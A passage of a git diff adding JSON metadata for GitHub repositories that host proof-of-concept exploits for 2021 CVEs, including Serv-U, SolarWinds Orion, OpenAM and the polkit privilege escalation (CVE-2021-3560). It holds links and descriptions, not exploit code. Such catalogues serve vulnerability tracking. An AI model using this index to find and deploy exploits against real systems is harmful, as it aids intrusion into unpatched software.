"full_name": "dja2TaqkGEEfA45\/CVE-2021-3516", + "owner": { + "login": "dja2TaqkGEEfA45", + "id": 82131630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-3516", + "description": null, + "fork": false, + "created_at": "2021-07-15T04:29:56Z", + "updated_at": "2021-07-15T04:29:56Z", + "pushed_at": "2021-07-15T04:29:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35211.json b/2021/CVE-2021-35211.json new file mode 100644 index 0000000000..73837811f7 --- /dev/null +++ b/2021/CVE-2021-35211.json @@ -0,0 +1,95 @@ +[ + { + "id": 411886593, + "name": "Serv-U-CVE-2021-35211", + "full_name": "NattiSamson\/Serv-U-CVE-2021-35211", + "owner": { + "login": "NattiSamson", + "id": 45117900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45117900?v=4", + "html_url": "https:\/\/github.com\/NattiSamson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NattiSamson\/Serv-U-CVE-2021-35211", + "description": "Simple Serv-U CVE-2021-35211 PoC", + "fork": false, + "created_at": "2021-09-30T01:45:42Z", + "updated_at": "2024-07-06T08:22:29Z", + "pushed_at": "2021-09-30T01:46:00Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420609702, + "name": "CVE-2021-35211", + "full_name": "0xhaggis\/CVE-2021-35211", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-35211", + "description": "Serv-U-FTP CVE-2021-35211 exploit", + "fork": false, + "created_at": "2021-10-24T06:51:16Z", + "updated_at": "2024-04-22T06:37:05Z", + "pushed_at": "2021-11-12T23:31:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 447857478, + "name": "CVE-2021-35211", + "full_name": "BishopFox\/CVE-2021-35211", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2021-35211", + "description": null, + "fork": false, + "created_at": "2022-01-14T05:52:17Z", + "updated_at": "2024-10-03T05:16:01Z", + "pushed_at": "2022-01-14T05:56:09Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35215.json b/2021/CVE-2021-35215.json new file mode 100644 index 0000000000..03c4e6b722 --- /dev/null +++ b/2021/CVE-2021-35215.json @@ -0,0 +1,33 @@ +[ + { + "id": 420286323, + "name": "CVE-2021-35215", + "full_name": "Y4er\/CVE-2021-35215", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2021-35215", + "description": "SolarWinds Orion Platform ActionPluginBaseView 反序列化RCE", + "fork": false, + "created_at": "2021-10-23T01:35:42Z", + "updated_at": "2024-06-08T01:00:04Z", + "pushed_at": "2021-10-23T01:44:54Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35250.json b/2021/CVE-2021-35250.json new file mode 100644 index 0000000000..9bfe70a185 --- /dev/null +++ b/2021/CVE-2021-35250.json @@ -0,0 +1,33 @@ +[ + { + "id": 627256634, + "name": "SolarWinds-CVE-2021-35250", + "full_name": "rissor41\/SolarWinds-CVE-2021-35250", + "owner": { + "login": "rissor41", + "id": 37665001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37665001?v=4", + "html_url": "https:\/\/github.com\/rissor41", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rissor41\/SolarWinds-CVE-2021-35250", + "description": null, + "fork": false, + "created_at": "2023-04-13T05:13:38Z", + "updated_at": "2024-11-13T12:26:56Z", + "pushed_at": "2023-04-14T05:58:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35296.json b/2021/CVE-2021-35296.json new file mode 100644 index 0000000000..42223c9f5a --- /dev/null +++ b/2021/CVE-2021-35296.json @@ -0,0 +1,33 @@ +[ + { + "id": 412175760, + "name": "CVE-2021-35296", + "full_name": "afaq1337\/CVE-2021-35296", + "owner": { + "login": "afaq1337", + "id": 45089292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4", + "html_url": "https:\/\/github.com\/afaq1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afaq1337\/CVE-2021-35296", + "description": "PoC of CVE-2021-35296 - PTCL Modem HG150-Ub", + "fork": false, + "created_at": "2021-09-30T18:18:27Z", + "updated_at": "2022-07-15T05:19:10Z", + "pushed_at": "2023-12-31T06:38:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35464.json b/2021/CVE-2021-35464.json new file mode 100644 index 0000000000..84f9824d89 --- /dev/null +++ b/2021/CVE-2021-35464.json @@ -0,0 +1,64 @@ +[ + { + "id": 381902138, + "name": "openam-CVE-2021-35464", + "full_name": "Y4er\/openam-CVE-2021-35464", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/openam-CVE-2021-35464", + "description": "openam-CVE-2021-35464 tomcat 执行命令回显", + "fork": false, + "created_at": "2021-07-01T03:51:32Z", + "updated_at": "2024-08-12T20:14:21Z", + "pushed_at": "2022-12-15T00:35:40Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 87, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 398670596, + "name": "CVE-2021-35464", + "full_name": "rood8008\/CVE-2021-35464", + "owner": { + "login": "rood8008", + "id": 49926338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49926338?v=4", + "html_url": "https:\/\/github.com\/rood8008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rood8008\/CVE-2021-35464", + "description": null, + "fork": false, + "created_at": "2021-08-21T22:53:39Z", + "updated_at": "2021-08-21T22:58:42Z", + "pushed_at": "2021-08-21T22:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35475.json b/2021/CVE-2021-35475.json new file mode 100644 index 0000000000..33657e2b82 --- /dev/null +++ b/2021/CVE-2021-35475.json @@ -0,0 +1,33 @@ +[ + { + "id": 380110029, + "name": "CVE-2021-35475", + "full_name": "saitamang\/CVE-2021-35475", + "owner": { + "login": "saitamang", + "id": 41514973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41514973?v=4", + "html_url": "https:\/\/github.com\/saitamang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saitamang\/CVE-2021-35475", + "description": "Writeup for CVE-2021-35475; Stored Cross-Site Scripting(XSS) on SAS® Environment Manager 2.5", + "fork": false, + "created_at": "2021-06-25T03:08:44Z", + "updated_at": "2022-07-22T12:56:15Z", + "pushed_at": "2022-07-24T15:39:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35492.json b/2021/CVE-2021-35492.json new file mode 100644 index 0000000000..14a847ad1d --- /dev/null +++ b/2021/CVE-2021-35492.json @@ -0,0 +1,33 @@ +[ + { + "id": 414366264, + "name": "CVE-2021-35492", + "full_name": "N4nj0\/CVE-2021-35492", + "owner": { + "login": "N4nj0", + "id": 76006964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76006964?v=4", + "html_url": "https:\/\/github.com\/N4nj0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N4nj0\/CVE-2021-35492", + "description": "Denial of Service tool for Wowza Streaming Engine <= 4.8.11+5 - Uncontrolled Resource Consumption (CVE-2021-35492)", + "fork": false, + "created_at": "2021-10-06T20:53:00Z", + "updated_at": "2021-10-06T21:21:59Z", + "pushed_at": "2021-10-06T21:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35576.json b/2021/CVE-2021-35576.json new file mode 100644 index 0000000000..b47ac32692 --- /dev/null +++ b/2021/CVE-2021-35576.json @@ -0,0 +1,33 @@ +[ + { + "id": 502415385, + "name": "CVE-2021-35576", + "full_name": "emad-almousa\/CVE-2021-35576", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-35576", + "description": "CVE-2021-35576", + "fork": false, + "created_at": "2022-06-11T17:36:01Z", + "updated_at": "2022-06-11T17:36:01Z", + "pushed_at": "2022-06-11T17:37:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-35587.json b/2021/CVE-2021-35587.json new file mode 100644 index 0000000000..1845c63bb9 --- /dev/null +++ b/2021/CVE-2021-35587.json @@ -0,0 +1,33 @@ +[ + { + "id": 469587526, + "name": "CVE-2021-35587", + "full_name": "ZZ-SOCMAP\/CVE-2021-35587", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2021-35587", + "description": "Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587", + "fork": false, + "created_at": "2022-03-14T05:03:54Z", + "updated_at": "2024-09-19T01:50:33Z", + "pushed_at": "2022-03-14T05:07:01Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3560.json b/2021/CVE-2021-3560.json new file mode 100644 index 0000000000..7492605a22 --- /dev/null +++ b/2021/CVE-2021-3560.json @@ -0,0 +1,809 @@ +[ + { + "id": 376019552, + "name": "polkit-auto-exploit", + "full_name": "aancw\/polkit-auto-exploit", + "owner": { + "login": "aancw", + "id": 6284204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6284204?v=4", + "html_url": "https:\/\/github.com\/aancw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aancw\/polkit-auto-exploit", + "description": "Automatic Explotation PoC for Polkit CVE-2021-3560", + "fork": false, + "created_at": "2021-06-11T12:33:56Z", + "updated_at": "2023-09-18T20:53:40Z", + "pushed_at": "2021-08-24T04:51:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 376051053, + "name": "polkadots", + "full_name": "swapravo\/polkadots", + "owner": { + "login": "swapravo", + "id": 68004413, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68004413?v=4", + "html_url": "https:\/\/github.com\/swapravo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swapravo\/polkadots", + "description": "CVE-2021-3560 Local PrivEsc Exploit", + "fork": false, + "created_at": "2021-06-11T14:28:43Z", + "updated_at": "2024-11-13T06:49:51Z", + "pushed_at": "2021-06-12T17:48:38Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3560", + "exploits", + "poc", + "polkit", + "privilege-escalation" + ], + "visibility": "public", + "forks": 12, + "watchers": 76, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 376208961, + "name": "CVE-2021-3560", + "full_name": "hakivvi\/CVE-2021-3560", + "owner": { + "login": "hakivvi", + "id": 67718634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4", + "html_url": "https:\/\/github.com\/hakivvi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakivvi\/CVE-2021-3560", + "description": "a reliable C based exploit and writeup for CVE-2021-3560.", + "fork": false, + "created_at": "2021-06-12T05:22:35Z", + "updated_at": "2024-08-12T20:13:51Z", + "pushed_at": "2021-06-23T11:07:32Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2021-3560" + ], + "visibility": "public", + "forks": 12, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 376695409, + "name": "CVE-2021-3560_PoC", + "full_name": "iSTAR-Lab\/CVE-2021-3560_PoC", + "owner": { + "login": "iSTAR-Lab", + "id": 86260908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86260908?v=4", + "html_url": "https:\/\/github.com\/iSTAR-Lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSTAR-Lab\/CVE-2021-3560_PoC", + "description": "polkit exploit script v1.0", + "fork": false, + "created_at": "2021-06-14T03:45:38Z", + "updated_at": "2021-07-02T18:28:41Z", + "pushed_at": "2021-06-14T18:06:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 376943596, + "name": "CVE-2021-3560-Polkit-Privilege-Esclation", + "full_name": "secnigma\/CVE-2021-3560-Polkit-Privilege-Esclation", + "owner": { + "login": "secnigma", + "id": 78214540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78214540?v=4", + "html_url": "https:\/\/github.com\/secnigma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secnigma\/CVE-2021-3560-Polkit-Privilege-Esclation", + "description": null, + "fork": false, + "created_at": "2021-06-14T20:08:20Z", + "updated_at": "2024-11-23T22:06:46Z", + "pushed_at": "2022-11-16T13:14:56Z", + "stargazers_count": 112, + "watchers_count": 112, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 112, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 377076931, + "name": "CVE-2021-3560", + "full_name": "curtishoughton\/CVE-2021-3560", + "owner": { + "login": "curtishoughton", + "id": 47698784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47698784?v=4", + "html_url": "https:\/\/github.com\/curtishoughton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/curtishoughton\/CVE-2021-3560", + "description": "Polkit - Local Privilege Escalation (CVE-2021-3560)", + "fork": false, + "created_at": "2021-06-15T07:37:15Z", + "updated_at": "2021-07-26T07:06:22Z", + "pushed_at": "2021-06-14T14:54:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 378360079, + "name": "Polkit-exploit", + "full_name": "Almorabea\/Polkit-exploit", + "owner": { + "login": "Almorabea", + "id": 13198863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4", + "html_url": "https:\/\/github.com\/Almorabea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Almorabea\/Polkit-exploit", + "description": "Privilege escalation with polkit - CVE-2021-3560", + "fork": false, + "created_at": "2021-06-19T08:15:17Z", + "updated_at": "2024-11-26T22:44:38Z", + "pushed_at": "2021-06-20T07:38:13Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 50, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 50, + "watchers": 116, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381492885, + "name": "Polkit-CVE-2021-3560", + "full_name": "AssassinUKG\/Polkit-CVE-2021-3560", + "owner": { + "login": "AssassinUKG", + "id": 5285547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4", + "html_url": "https:\/\/github.com\/AssassinUKG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AssassinUKG\/Polkit-CVE-2021-3560", + "description": null, + "fork": false, + "created_at": "2021-06-29T20:47:16Z", + "updated_at": "2023-11-03T08:10:49Z", + "pushed_at": "2021-06-29T21:09:41Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 24, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 382305236, + "name": "CVE-2021-3560", + "full_name": "cpu0x00\/CVE-2021-3560", + "owner": { + "login": "cpu0x00", + "id": 86830248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86830248?v=4", + "html_url": "https:\/\/github.com\/cpu0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cpu0x00\/CVE-2021-3560", + "description": "ubuntu new PrivEsc race condition vulnerability", + "fork": false, + "created_at": "2021-07-02T10:03:26Z", + "updated_at": "2024-08-26T07:05:52Z", + "pushed_at": "2021-08-05T02:07:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390233864, + "name": "CVE-2021-3560", + "full_name": "BizarreLove\/CVE-2021-3560", + "owner": { + "login": "BizarreLove", + "id": 41328139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41328139?v=4", + "html_url": "https:\/\/github.com\/BizarreLove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BizarreLove\/CVE-2021-3560", + "description": "NYCY_homework_&_meeting", + "fork": false, + "created_at": "2021-07-28T06:05:46Z", + "updated_at": "2021-07-29T08:24:46Z", + "pushed_at": "2021-07-29T08:24:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 391043530, + "name": "CVE-2021-3560", + "full_name": "0dayNinja\/CVE-2021-3560", + "owner": { + "login": "0dayNinja", + "id": 88158703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88158703?v=4", + "html_url": "https:\/\/github.com\/0dayNinja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dayNinja\/CVE-2021-3560", + "description": "Polkit D-Bus Authentication Bypass Exploit", + "fork": false, + "created_at": "2021-07-30T11:41:34Z", + "updated_at": "2024-08-12T20:15:08Z", + "pushed_at": "2021-07-30T11:43:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427315131, + "name": "CVE-2021-3560", + "full_name": "admin-079\/CVE-2021-3560", + "owner": { + "login": "admin-079", + "id": 64571518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64571518?v=4", + "html_url": "https:\/\/github.com\/admin-079", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/admin-079\/CVE-2021-3560", + "description": "CVE-2021-3560 (Polkit - Local Privilege Escalation)", + "fork": false, + "created_at": "2021-11-12T10:15:45Z", + "updated_at": "2021-12-21T14:39:48Z", + "pushed_at": "2021-07-26T07:08:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 453938064, + "name": "CVE-2021-3560", + "full_name": "chenaotian\/CVE-2021-3560", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-3560", + "description": "CVE-2021-3560 analysis", + "fork": false, + "created_at": "2022-01-31T09:02:23Z", + "updated_at": "2024-11-27T19:11:24Z", + "pushed_at": "2022-05-23T02:23:38Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 454864474, + "name": "CVE-2021-3560", + "full_name": "NeonWhiteRabbit\/CVE-2021-3560", + "owner": { + "login": "NeonWhiteRabbit", + "id": 97998625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4", + "html_url": "https:\/\/github.com\/NeonWhiteRabbit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-3560", + "description": "Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!", + "fork": false, + "created_at": "2022-02-02T17:08:24Z", + "updated_at": "2023-03-24T03:48:31Z", + "pushed_at": "2022-02-02T18:07:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458772805, + "name": "CVE-2021-3560-Polkit-DBus", + "full_name": "f4T1H21\/CVE-2021-3560-Polkit-DBus", + "owner": { + "login": "f4T1H21", + "id": 83399767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4", + "html_url": "https:\/\/github.com\/f4T1H21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4T1H21\/CVE-2021-3560-Polkit-DBus", + "description": "f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation", + "fork": false, + "created_at": "2022-02-13T10:12:51Z", + "updated_at": "2024-02-24T11:42:39Z", + "pushed_at": "2022-02-13T11:16:06Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3560", + "dbus", + "exploit", + "linux", + "polkit", + "privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 463667394, + "name": "CVE-2021-3560", + "full_name": "innxrmxst\/CVE-2021-3560", + "owner": { + "login": "innxrmxst", + "id": 43517528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43517528?v=4", + "html_url": "https:\/\/github.com\/innxrmxst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/innxrmxst\/CVE-2021-3560", + "description": null, + "fork": false, + "created_at": "2022-02-25T20:30:31Z", + "updated_at": "2022-11-19T21:44:18Z", + "pushed_at": "2022-02-25T20:31:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 487080832, + "name": "CVE-2021-3560-Authentication-Agent", + "full_name": "RicterZ\/CVE-2021-3560-Authentication-Agent", + "owner": { + "login": "RicterZ", + "id": 5282759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5282759?v=4", + "html_url": "https:\/\/github.com\/RicterZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RicterZ\/CVE-2021-3560-Authentication-Agent", + "description": "PolicyKit CVE-2021-3560 Exploit (Authentication Agent)", + "fork": false, + "created_at": "2022-04-29T18:57:30Z", + "updated_at": "2024-11-25T03:32:03Z", + "pushed_at": "2022-05-02T07:49:01Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 116, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 487194704, + "name": "CVE-2021-3560", + "full_name": "WinMin\/CVE-2021-3560", + "owner": { + "login": "WinMin", + "id": 18380453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18380453?v=4", + "html_url": "https:\/\/github.com\/WinMin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WinMin\/CVE-2021-3560", + "description": "PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)", + "fork": false, + "created_at": "2022-04-30T05:53:45Z", + "updated_at": "2024-08-12T20:22:52Z", + "pushed_at": "2023-03-06T05:22:36Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 24, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 488025652, + "name": "exploit-CVE-2021-3560", + "full_name": "UNICORDev\/exploit-CVE-2021-3560", + "owner": { + "login": "UNICORDev", + "id": 103281826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4", + "html_url": "https:\/\/github.com\/UNICORDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2021-3560", + "description": "Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation", + "fork": false, + "created_at": "2022-05-02T23:56:31Z", + "updated_at": "2024-02-19T06:22:46Z", + "pushed_at": "2022-06-26T16:26:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3560", + "exploit", + "hackthebox", + "linux", + "penetration-testing", + 